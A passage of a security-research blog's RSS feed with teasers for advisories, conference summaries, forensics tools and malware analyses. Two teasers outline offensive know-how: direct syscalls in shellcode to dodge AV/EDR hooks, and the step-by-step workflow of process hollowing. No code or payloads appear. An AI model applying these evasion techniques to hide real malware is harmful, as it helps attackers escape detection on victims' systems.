      <pubDate>Thu, 25 May 2023 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2023/05/imf-conference-2023-in-munich/</guid>
      <description>&lt;p&gt;The IMF Conference is the &lt;em&gt;International Conference on IT Security Incident&#xA;Management &amp;amp; IT Forensics&lt;/em&gt;. This year it took place from May 23 to 24 in Munich.&#xA;The schedule lists&#xA;&lt;a href=&#34;https://imf-conference.org/imf2023/program.html&#34;&gt;a lot of interesting talks&lt;/a&gt;.&#xA;One of the talks was my presentation on a paper about Ceph forensics, based on&#xA;my Master Thesis:&lt;/p&gt;&#xA;&lt;p&gt;The concept of Software Defined Storage (SDS) has become very popular over the&#xA;last few years.  It is used in public, private, and hybrid clouds to store&#xA;enterprise, private, and other kinds of data. &lt;a href=&#34;https://ceph.io/&#34;&gt;Ceph&lt;/a&gt; is an&#xA;open-source software that implements an SDS stack.&lt;/p&gt;</description>
    </item>
    <item>
      <title>AD /Azure Security Track on Troopers 23</title>
      <link>https://insinuator.net/2023/05/ad-/azure-security-track-on-troopers-23/</link>
      <pubDate>Fri, 05 May 2023 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2023/05/ad-/azure-security-track-on-troopers-23/</guid>
      <description>&lt;p&gt;&lt;strong&gt;Hi!&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;We’re excited to announce the nearly complete composition of the Active&#xA;Directory &amp;amp; Azure Security Track on Troopers 23 with fantastic speakers!&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Here we go:&lt;/p&gt;&#xA;&lt;p&gt;“&lt;a href=&#34;https://troopers.de/troopers23/talks/ywstkv/&#34;&gt;Dumping NTHashes from Azure AD&lt;/a&gt;”&lt;br&gt;&#xA;(Nestori&#xA;Syynimaa)&lt;/p&gt;&#xA;&lt;p&gt;“&lt;a href=&#34;https://troopers.de/troopers23/talks/33fcyz/&#34;&gt;Hidden Pathways: Exploring the Anatomy of ACL-Based Active Directory Attacks and Building Strong Defenses&lt;/a&gt;”&lt;br&gt;&#xA;(Jonas&#xA;Bülow Knudsen, Alexander Schmitt)&lt;/p&gt;&#xA;&lt;p&gt;“&lt;a href=&#34;https://troopers.de/troopers23/talks/9tqyud/&#34;&gt;Priority for Effective Action – A Practical Model for quantifying the Risk of Active Directory Attacks&lt;/a&gt;”&lt;br&gt;&#xA;(Mars&#xA;Cheng, Dexter Chen)&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hack In The Box Security Conference 2023 @ Amsterdam - Summary</title>
      <link>https://insinuator.net/2023/05/hack-in-the-box-security-conference-2023-@-amsterdam-summary/</link>
      <pubDate>Thu, 04 May 2023 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2023/05/hack-in-the-box-security-conference-2023-@-amsterdam-summary/</guid>
      <description>&lt;p&gt;In this blog post, we are sharing summaries of talks from the Hack in the Box&#xA;Conference in Amsterdam (HITBSecConf2023), the final HITB conference in&#xA;Amsterdam. Before we do that, however, we would like to extend a heartfelt thank&#xA;you to the organizers of the conference for putting together such an insightful&#xA;and engaging event.&lt;/p&gt;&#xA;&lt;h2 id=&#34;drbramwell-brizendine--windows-syscalls-in-shellcode-advanced-techniques-for-malicious-functionality&#34;&gt;Dr. Bramwell Brizendine – Windows Syscalls in Shellcode: Advanced Techniques for Malicious Functionality&lt;/h2&gt;&#xA;&lt;p&gt;The talk by Bramwell Brizendine covered the topic of syscall usage in shell&#xA;code. The general idea here is to hide from AV/EDR systems by not using APIs&#xA;such as &lt;code&gt;CreateProcessA&lt;/code&gt;, which may be monitored, but to directly call into the&#xA;corresponding kernel functions. This can be accomplished for example with the&#xA;&lt;em&gt;syscall&lt;/em&gt; CPU instruction (see &lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt;, &lt;sup id=&#34;fnref:2&#34;&gt;&lt;a href=&#34;#fn:2&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;2&lt;/a&gt;&lt;/sup&gt; and &lt;sup id=&#34;fnref:3&#34;&gt;&lt;a href=&#34;#fn:3&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;3&lt;/a&gt;&lt;/sup&gt; for more information). While&#xA;this technique is not perfectly stealthy and can still be detected (e.g., with a&#xA;kernel driver), it circumvents at least inline-hooks in user space. Another&#xA;downside is the effort of building shell code that directly uses syscalls.&#xA;Besides more overhead in preparing everything for the syscall (for example&#xA;manually creating appropriate structs), the correct syscall ID must be gathered,&#xA;which can change between kernel versions.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hilarious Buffer Overflow  Mitigation and TCL Injection in CheckPoint Gaia Portal</title>
      <link>https://insinuator.net/2022/12/hilarious-buffer-overflow-mitigation-and-tcl-injection-in-checkpoint-gaia-portal/</link>
      <pubDate>Fri, 16 Dec 2022 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2022/12/hilarious-buffer-overflow-mitigation-and-tcl-injection-in-checkpoint-gaia-portal/</guid>
      <description>&lt;p&gt;Hey there,&lt;/p&gt;&#xA;&lt;p&gt;I am going to disclose two bug classes I found a while ago in CheckPoint R77.30:&#xA;Two buffer overflows in the username (no shit) and HTTP method of a request to&#xA;the administrative UI pre-auth and some interesting injections into the TCL web&#xA;interface.&lt;/p&gt;&#xA;&lt;p&gt;Let’s start with the TCL part. The web interface reacted pretty weird when a&#xA;payload contained a colon. Diving deeper into this it became clear that a colon&#xA;would actually cause an error from the TCL interpreter. By going down this&#xA;rabbit hole and learning some TCL (:D) you could see that injecting a colon&#xA;breaks some part of the application code, probably because colons are control&#xA;characters in TCL e.g. preceding a global variable in TCL (::MyVar) or&#xA;separating namespaces.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some experiments with Process Hollowing</title>
      <link>https://insinuator.net/2022/09/some-experiments-with-process-hollowing/</link>
      <pubDate>Thu, 29 Sep 2022 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2022/09/some-experiments-with-process-hollowing/</guid>
      <description>&lt;p&gt;Process Hollowing is a technique used by various malware families (such as&#xA;FormBook, TrickBot and Agent Tesla) to hide their malicious code within a benign&#xA;appearing process. The typical workflow for setting up such a&#xA;&lt;a href=&#34;https://attack.mitre.org/techniques/T1055/012/&#34;&gt;hollowed process&lt;/a&gt; is as&#xA;follows:&lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;Create a new process (victim) using a benign executable, in suspended state.&lt;/li&gt;&#xA;&lt;li&gt;Unmap the executable from that process.&lt;/li&gt;&#xA;&lt;li&gt;Allocate memory for the malicious executable at the address of the&#xA;previously mapped victim executable.&lt;/li&gt;&#xA;&lt;li&gt;Write the malicious executable to the new memory area and potentially apply&#xA;relocations.&lt;/li&gt;&#xA;&lt;li&gt;Adjust the entry point.&lt;/li&gt;&#xA;&lt;li&gt;Resume process.&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;p&gt;We will refer to this as the “normal” Process Hollowing workflow. There are also&#xA;variants of this technique, one being to not unmap the original executable and&#xA;to allocate the new memory somewhere else. We will call this one no-unmap. But&#xA;wait, why does malware not simply overwrite the existing executable but creates&#xA;a new memory area which stands out due to its characteristics? In this blog post&#xA;we will have a closer look at this overwrite approach but also on the no-unmap&#xA;method, their effects on analysis/detection tools and on some tricks to make the&#xA;detection harder. We are also releasing Proof of Concept implementations of all&#xA;mentioned tools/plugins (the links are at the end of this post).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Spymax: The android RAT and it works like that</title>
      <link>https://insinuator.net/2022/09/spymax-the-android-rat-and-it-works-like-that/</link>
      <pubDate>Wed, 07 Sep 2022 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2022/09/spymax-the-android-rat-and-it-works-like-that/</guid>
      <description>&lt;p&gt;Spymax is a mobile Remote Administration Tool (RAT) that enables an attacker to&#xA;control victims’ devices through an Android malware. Once the malware is&#xA;installed on a phone, the attacker can execute many attacks that highly impact&#xA;the confidentiality and integrity of the victim’s data, as well as the victim’s&#xA;privacy. It is powerful, widely available, and does not require root privileges&#xA;on the victim’s device. In this blogpost, I show the capabilities of this RAT&#xA;and analyze how its Android malware works.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Whitepaper Endpoint Management &amp;amp; Monitoring Solutions Released</title>
      <link>https://insinuator.net/2022/08/whitepaper-endpoint-management-amp-monitoring-solutions-released/</link>
      <pubDate>Wed, 10 Aug 2022 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2022/08/whitepaper-endpoint-management-amp-monitoring-solutions-released/</guid>
      <description>&lt;p&gt;Over the course of the last 2 years we performed vulnerability research on&#xA;several Endpoint Management &amp;amp; Monitoring Solutions. The results were already&#xA;partially presented in security advisories which were published on this blog&#xA;during the last two years. The advisories can be found here:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://insinuator.net/2020/06/security-advisories-for-ivanti-dsm-suite/&#34;&gt;Ivanti DSM Suite&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://insinuator.net/2020/12/security-advisories-for-solarwinds-n-central/&#34;&gt;Solarwinds N-Central&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://insinuator.net/2020/07/security-advisories-for-nagios-xi/&#34;&gt;Nagios XI&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://insinuator.net/2022/06/security-advisories-for-broadcom-automic-automation-uc4/&#34;&gt;Broadcom Automic Automation (UC4)&lt;/a&gt;&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;We also recently presented the results on&#xA;&lt;a href=&#34;https://troopers.de/troopers22/agenda/tr22-1088-a-vulnerability-analysis-of-endpoint-management-monitoring-solutions/&#34;&gt;Troopers 2022&lt;/a&gt;.&#xA;Now the results have been published in a more in-depth manner in the form of a&#xA;technical whitepaper. The whitepaper can be found&#xA;&lt;a href=&#34;https://ernw.de/en/whitepapers/issue-72.html&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Advisories for Broadcom Automic Automation (UC4)</title>
      <link>https://insinuator.net/2022/06/security-advisories-for-broadcom-automic-automation-uc4/</link>
      <pubDate>Thu, 09 Jun 2022 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2022/06/security-advisories-for-broadcom-automic-automation-uc4/</guid>
      <description>&lt;h2 id=&#34;updated-on-200622-with-cves-and-link-to-broadcom-security-notice&#34;&gt;Updated on 20.06.22 with CVEs and link to Broadcom Security Notice.&lt;/h2&gt;&#xA;&lt;p&gt;In April 2021 we reported seven vulnerabilities in Broadcom Automic Automation&#xA;(UC4) 12.3.5+hf.3. CVE IDs were assigned on 16.06.22, the corresponding Broadcom&#xA;Security Notice can be found&#xA;&lt;a href=&#34;https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/20629&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;The vulnerabilities have been found in the course of a research project, in&#xA;which we analyzed the security of multiple Endpoint Management solutions.&#xA;Similar vulnerabilities have been found in other solutions as we pointed out in&#xA;previous posts about the&#xA;&lt;a href=&#34;https://insinuator.net/2020/06/security-advisories-for-ivanti-dsm-suite/&#34;&gt;Ivanti DSM Suite&lt;/a&gt;,&#xA;&lt;a href=&#34;https://insinuator.net/2020/07/security-advisories-for-nagios-xi/&#34;&gt;Nagios XI&lt;/a&gt;,&#xA;and&#xA;&lt;a href=&#34;https://insinuator.net/2020/12/security-advisories-for-solarwinds-n-central/&#34;&gt;Solarwinds N-Central&lt;/a&gt;. &#xA;The outcome of the research project will be published as a whitepaper and a&#xA;conference talk at&#xA;&lt;a href=&#34;https://troopers.de/troopers22/talks/brzgam/&#34;&gt;Troopers 2022&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Solving client-side controls once and for all</title>
      <link>https://insinuator.net/2022/04/solving-client-side-controls-once-and-for-all/</link>
      <pubDate>Fri, 01 Apr 2022 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2022/04/solving-client-side-controls-once-and-for-all/</guid>
      <description>&lt;p&gt;Missing server-side validation consistently scores a place in the&#xA;&lt;a href=&#34;https://owasp.org/www-project-top-ten/&#34;&gt;OWASP Top 10&lt;/a&gt;. Browsers nowadays offer&#xA;a lot of ways to easily implement client-side controls, increasing the usability&#xA;by a lot. They automatically detect missing fields or invalid characters in your&#xA;input fields and may even validate user input against a regular expressions.&lt;/p&gt;&#xA;&lt;p&gt;However, these controls should only be considered as usability features. When&#xA;sending data to a back-end system the application must always ensure data&#xA;integrity by implementing encodings, validations and filters. Even for small&#xA;applications this is a painful and tedious process. For each possible input,&#xA;developers together with security experts have to carefully identify the context&#xA;of each field, how the input is going to be used and what data requirements are&#xA;present.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Tale of an OFTP2 Vulnerability</title>
      <link>https://insinuator.net/2022/03/a-tale-of-an-oftp2-vulnerability/</link>
      <pubDate>Thu, 24 Mar 2022 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2022/03/a-tale-of-an-oftp2-vulnerability/</guid>
      <description>&lt;p&gt;This is a guest post from Thomas Smits.&lt;/p&gt;&#xA;&lt;h2 id=&#34;a-long-time-ago-in-a-galaxy-far-far-away&#34;&gt;A long time ago in a galaxy far, far away….&lt;/h2&gt;&#xA;&lt;p&gt;In my ordinary life, I teach computer science at the University of Applied&#xA;Sciences in Mannheim but for some months, I was an intern at ERNW learning a lot&#xA;about IT security and penetration testing. One of these learnings is that old&#xA;protocols can be fun and breaking them even more. But let’s start at the&#xA;beginning of the story…&lt;/p&gt;</description>
    </item>
    <item>
      <title>Release of PTE Analysis plugins for Volatility 3</title>
      <link>https://insinuator.net/2021/12/release-of-pte-analysis-plugins-for-volatility-3/</link>
      <pubDate>Fri, 31 Dec 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/12/release-of-pte-analysis-plugins-for-volatility-3/</guid>
      <description>&lt;p&gt;I’m happy to announce the&#xA;&lt;a href=&#34;https://github.com/f-block/volatility-plugins&#34;&gt;release&lt;/a&gt; of several plugins for&#xA;Volatility 3 that allow you to dig deeper into the memory analysis. One of those&#xA;plugins is &lt;code&gt;PteMalfind&lt;/code&gt;, which is essentially an improved version of &lt;code&gt;malfind&lt;/code&gt;.&#xA;Another one is &lt;code&gt;PteResolve&lt;/code&gt; which, similarly to the WinDBG command &lt;code&gt;!pte&lt;/code&gt;,&#xA;allows you to inspect Page Table Entry (PTE) information for e.g., a given&#xA;virtual address. In this blog post we will have a closer look at these and more&#xA;plugins, and the &lt;code&gt;PteEnumerator&lt;/code&gt; base class and what you can do with it. The&#xA;memory dump used for this blog post is available&#xA;&lt;a href=&#34;https://ernw.de/download/blogposts/pte_analysis/mem.dump.zip&#34;&gt;here&lt;/a&gt;. Some of&#xA;the injection tools used in this blog post can be gathered from&#xA;&lt;a href=&#34;https://github.com/f-block/DFRWS-USA-2019/tree/master/tools&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Change Your BLE Passkey Like You Change Your Underwear</title>
      <link>https://insinuator.net/2021/10/change-your-ble-passkey-like-you-change-your-underwear/</link>
      <pubDate>Thu, 21 Oct 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/10/change-your-ble-passkey-like-you-change-your-underwear/</guid>
      <description>&lt;p&gt;Using a static passkey for Bluetooth Low Energy pairing is insecure. Recent&#xA;versions of the Bluetooth specification contain an explicit warning about this.&#xA;However, in practice, we often see static passkeys being used. Moreover, there&#xA;are no public implementations of proofs-of-concept that can practically show why&#xA;using a static passkey is an issue. This is why we implemented one.&lt;/p&gt;&#xA;&lt;p&gt;In a recent assessment, we were testing a device that offered a Bluetooth&#xA;interface for data export and configuration. This device uses Bluetooth Low&#xA;Energy (BLE), and a static passkey (or PIN) is required to pair with it. This&#xA;passkey is displayed for a few seconds when the device is booted and stays the&#xA;same on each reboot. In fact, it is derived from static, device-specific data.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ManiMed: Ypsomed AG – mylife YpsoPump System Vulnerabilities</title>
      <link>https://insinuator.net/2021/07/manimed-ypsomed-ag-mylife-ypsopump-system-vulnerabilities/</link>
      <pubDate>Thu, 29 Jul 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/07/manimed-ypsomed-ag-mylife-ypsopump-system-vulnerabilities/</guid>
      <description>&lt;p&gt;The Federal Office for Information Security (BSI) aims to sensitize&#xA;manufacturers and the public regarding security risks of networked medical&#xA;devices in Germany. In response to the often fatal security reports and press&#xA;releases of networked medical devices, the BSI initiated the project&#xA;Manipulation of Medical Devices (ManiMed) in 2019. In this project, a security&#xA;analysis of selected products is carried out through security assessments&#xA;followed by Coordinated Vulnerability Diclosure (CVD) processes. The project&#xA;report was published on December 31, 2020, and can be accessed on the BSI&#xA;website&#xA;[&lt;a href=&#34;https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/DigitaleGesellschaft/ManiMed_Abschlussbericht_EN.html&#34;&gt;1&lt;/a&gt;].&lt;/p&gt;</description>
    </item>
    <item>
      <title>Analysis of HSTS Caches of Different Browsers</title>
      <link>https://insinuator.net/2021/05/analysis-of-hsts-caches-of-different-browsers/</link>
      <pubDate>Thu, 06 May 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/05/analysis-of-hsts-caches-of-different-browsers/</guid>
      <description>&lt;p&gt;I recently stumbled upon a strange behavior in my Firefox: I visited an&#xA;HTTPS-enabled website that I had visited before and saw that my Firefox&#xA;connected insecurely via HTTP. I found that strange because nowadays, most&#xA;websites set the&#xA;&lt;a href=&#34;https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security&#34;&gt;HSTS&lt;/a&gt;&#xA;header, which is supposed to force the browser to connect via HTTPS. I checked&#xA;whether this website set the HSTS header – and it did. This means my Firefox was&#xA;ignoring/forgetting about the HSTS header right after my visit.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Attack llvmpipe Graphics Driver from Chromium</title>
      <link>https://insinuator.net/2021/05/attack-llvmpipe-graphics-driver-from-chromium/</link>
      <pubDate>Tue, 04 May 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/05/attack-llvmpipe-graphics-driver-from-chromium/</guid>
      <description>&lt;p&gt;In this post, we are discussing a bug we came across in Mesas llvmpipe Gallium3D&#xA;graphics driver. This bug was accessible through Chromium’s WebGL implementation&#xA;and can provide control of the program counter (pc) within Chromium’s GPU&#xA;process if llvmpipe is used. Llvmpipe is a software rasterizer that is used on&#xA;Linux if no hardware acceleration (graphics card) is available. This is a pretty&#xA;rare edge case as llvmpipe has no widespread use. An estimate by Google is that&#xA;approx 0.06% of the Chromium users are affected by this. However, as this is a&#xA;simple but valid Chromium bug, we want to give you a quick walkthrough. The&#xA;issue is tracked as&#xA;&lt;a href=&#34;https://bugs.chromium.org/p/chromium/issues/detail?id=1155974&#34;&gt;CVE-2021-21153&lt;/a&gt;&#xA;and was fixed in February 2020.&lt;/p&gt;</description>
    </item>
    <item>
      <title>DogWhisperer&#39;s SharpHound Cheat Sheet</title>
      <link>https://insinuator.net/2021/05/dogwhisperers-sharphound-cheat-sheet/</link>
      <pubDate>Tue, 04 May 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/05/dogwhisperers-sharphound-cheat-sheet/</guid>
      <description>&lt;p&gt;BloodHound data collection, aka &lt;strong&gt;Sharphound&lt;/strong&gt;, is quite a complex beast.&lt;br&gt;&#xA;When giving BloodHound workshops, the part where I get the most questions is&#xA;always data collection.&lt;br&gt;&#xA;How is the BloodHound data collected? &lt;strong&gt;What methods do what?&lt;/strong&gt; Who am I talking&#xA;to? How do I fly under the radar?&lt;/p&gt;&#xA;&lt;p&gt;These are all very relevant questions when you think about it.&lt;br&gt;&#xA;After all, the rest is just a gorgeous UI sitting on top of a cool data model,&#xA;but the only bit of BloodHound code that ever touches the targeted network is&#xA;SharpHound. And so questions about it should be mandatory.&lt;br&gt;&#xA;Now even thought I’ve been working with BloodHound for quite a while, there is&#xA;always this moment where I have to check before answering… (I feel the older I&#xA;get, the quicker I understand, but the less I remember… but that’s another story&#xA;I guess…)&lt;/p&gt;</description>
    </item>
    <item>
      <title>BSI veröffentlicht Hardening Guide, Protokollierungs-Empfehlung und zugehörige GPOs für Windows 10 im Rahmen der SiSyPHuS-Studie</title>
      <link>https://insinuator.net/2021/05/bsi-ver%C3%B6ffentlicht-hardening-guide-protokollierungs-empfehlung-und-zugeh%C3%B6rige-gpos-f%C3%BCr-windows-10-im-rahmen-der-sisyphus-studie/</link>
      <pubDate>Mon, 03 May 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/05/bsi-ver%C3%B6ffentlicht-hardening-guide-protokollierungs-empfehlung-und-zugeh%C3%B6rige-gpos-f%C3%BCr-windows-10-im-rahmen-der-sisyphus-studie/</guid>
      <description>&lt;p&gt;Wir freuen uns, dass das Bundesamt für Sicherheit in der Informationstechnik&#xA;(BSI) im Rahmen des gemeinsam mit ERNW durchgeführten SiSyPHuS Win10-Projekts&#xA;(&lt;strong&gt;S&lt;/strong&gt;tud&lt;strong&gt;i&lt;/strong&gt;e zu &lt;strong&gt;Sy&lt;/strong&gt;stemintegrität, &lt;strong&gt;P&lt;/strong&gt;rotokollierung, &lt;strong&gt;H&lt;/strong&gt;ärtung&#xA;&lt;strong&gt;u&lt;/strong&gt;nd &lt;strong&gt;S&lt;/strong&gt;icherheitsfunktionen in Windows 10) heute (ca. 10 Uhr) die nächsten&#xA;drei Arbeitspakete veröffentlicht:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Empfehlung zur Härtung von Windows 10 mit Bordmitteln&lt;/li&gt;&#xA;&lt;li&gt;Empfehlung zur Konfiguration der Protokollierung in Windows 10&lt;/li&gt;&#xA;&lt;li&gt;Gruppenrichtlinien zu den Konfigurationsempfehlungen für Härtung und&#xA;Protokollierung für Windows 10&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;In den Dokumenten finden sich unterschiedliche Empfehlungen für&#xA;Domänenmitglieder (mit normalem und mit hohem Schutzbedarf) und&#xA;Einzelplatzrechner. Die Dokumente bauen auf den Empfehlungen von Microsofts&#xA;Security Baseline und dem CIS Benchmark für Windows 10 auf und ergänzen diese in&#xA;von Microsoft und CIS nicht betrachteten Bereichen oder modifizieren sie dort,&#xA;wo es aus Erfahrung von ERNW im Hardening von Windows-Systemen sinnvoll ist.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Of Corona, Buggy Audio Drivers and Industrial Espionage</title>
      <link>https://insinuator.net/2021/04/of-corona-buggy-audio-drivers-and-industrial-espionage/</link>
      <pubDate>Fri, 23 Apr 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/04/of-corona-buggy-audio-drivers-and-industrial-espionage/</guid>
      <description>&lt;h2 id=&#34;the-situation&#34;&gt;The Situation&lt;/h2&gt;&#xA;&lt;p&gt;Last year, the CISO of a customer sent me a laptop for analysis. The reason was&#xA;that he feared the company could have been victim of industrial espionage.&#xA;Starting in spring 2020, the IT help desk got several employee laptops with full&#xA;hard drives, caused by a huge amount of audio recordings. The audio files&#xA;contained recordings even of highly sensitive telephone conferences. An&#xA;automated scan on all employee computers for such audio recordings showed that&#xA;about 300 devices were affected.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Summary of &#39;Software-Defined Radio applied to security assessments&#39; at Troopers21</title>
      <link>https://insinuator.net/2021/04/summary-of-software-defined-radio-applied-to-security-assessments-at-troopers21/</link>
      <pubDate>Tue, 20 Apr 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/04/summary-of-software-defined-radio-applied-to-security-assessments-at-troopers21/</guid>
      <description>&lt;p&gt;The training&#xA;&lt;a href=&#34;https://troopers.de/troopers21/trainings/cmxfqk/&#34;&gt;Software-Defined Radio applied to security assessments&lt;/a&gt;&#xA;was held by Sébastien Dudek at Troopers21 and was remotely organized – like most&#xA;other events – due to Covid-19. Once we were all caffeinated, we had an exciting&#xA;journey through basically all things radio.&lt;/p&gt;&#xA;&lt;p&gt;We started with the technical and physical basics in radio technology, such as&#xA;various sorts of antennas, analog to digital coding (and backward), encoding&#xA;schemes, and general risks and possible vulnerabilities of using radio devices.&#xA;Commonly found vulnerabilities include the following:&lt;/p&gt;</description>
    </item>
    <item>
      <title>fpicker: Fuzzing with Frida</title>
      <link>https://insinuator.net/2021/03/fpicker-fuzzing-with-frida/</link>
      <pubDate>Mon, 15 Mar 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/03/fpicker-fuzzing-with-frida/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;In this post, I will introduce fpicker. Fpicker is a Frida-based&#xA;coverage-guided, mostly in-process, blackbox fuzzing suite. Its most significant&#xA;feature is the AFL++ proxy mode which enables blackbox in-process fuzzing with&#xA;AFL++ on platforms supported by Frida. In practice, this means that fpicker&#xA;enables fuzzing binary-only targets with AFL++ on potentially any system that is&#xA;supported by Frida. For example, it allows fuzzing a user-space application on&#xA;the iOS operating system, such as the Bluetooth daemon bluetoothd – which was&#xA;part of the original motivation to implement fpicker.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ManiMed: Hamilton Medical AG – HAMILTON-T1 Ventilator Vulnerabilities</title>
      <link>https://insinuator.net/2021/02/manimed-hamilton-medical-ag-hamilton-t1-ventilator-vulnerabilities/</link>
      <pubDate>Mon, 22 Feb 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/02/manimed-hamilton-medical-ag-hamilton-t1-ventilator-vulnerabilities/</guid>
      <description>&lt;p&gt;The Federal Office for Information Security (BSI) aims to sensitize&#xA;manufacturers and the public regarding security risks of networked medical&#xA;devices in Germany. In response to the often fatal security reports and press&#xA;releases of networked medical devices, the BSI initiated the project&#xA;Manipulation of Medical Devices (ManiMed) in 2019. In this project, a security&#xA;analysis of selected products is carried out through security assessments&#xA;followed by Coordinated Vulnerability Diclosure (CVD) processes. The project&#xA;report was published on December 31, 2020, and can be accessed on the BSI&#xA;website &lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ManiMed: B. Braun Melsungen AG – Space System Vulnerabilities</title>
      <link>https://insinuator.net/2021/02/manimed-b.-braun-melsungen-ag-space-system-vulnerabilities/</link>
      <pubDate>Mon, 15 Feb 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/02/manimed-b.-braun-melsungen-ag-space-system-vulnerabilities/</guid>
      <description>&lt;p&gt;The Federal Office for Information Security (BSI) aims to sensitize&#xA;manufacturers and the public regarding security risks of networked medical&#xA;devices in Germany. In response to the often fatal security reports and press&#xA;releases of networked medical devices, the BSI initiated the project&#xA;Manipulation of Medical Devices (ManiMed) in 2019. In this project, a security&#xA;analysis of selected products is carried out through security assessments&#xA;followed by Coordinated Vulnerability Diclosure (CVD) processes. The project&#xA;report was published on December 31, 2020, and can be accessed on the BSI&#xA;website&lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ManiMed: Innokas Yhtymä Oy - VC150 Patient Monitor Vulnerabilities</title>
      <link>https://insinuator.net/2021/02/manimed-innokas-yhtym%C3%A4-oy-vc150-patient-monitor-vulnerabilities/</link>
      <pubDate>Mon, 01 Feb 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/02/manimed-innokas-yhtym%C3%A4-oy-vc150-patient-monitor-vulnerabilities/</guid>
      <description>&lt;p&gt;The Federal Office for Information Security (BSI) aims to sensitize&#xA;manufacturers and the public regarding security risks of networked medical&#xA;devices in Germany. In response to the often fatal security reports and press&#xA;releases of networked medical devices, the BSI initiated the project&#xA;Manipulation of Medical Devices (ManiMed) in 2019. In this project, a security&#xA;analysis of selected products is carried out through security assessments&#xA;followed by Coordinated Vulnerability Diclosure (CVD) processes. The project&#xA;report was published on December 31, 2020, and can be accessed on the BSI&#xA;website&lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW Whitepaper 71: Analysis of Anti-Virus Software Quarantine Files</title>
      <link>https://insinuator.net/2021/01/ernw-whitepaper-71-analysis-of-anti-virus-software-quarantine-files/</link>
      <pubDate>Wed, 27 Jan 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/01/ernw-whitepaper-71-analysis-of-anti-virus-software-quarantine-files/</guid>
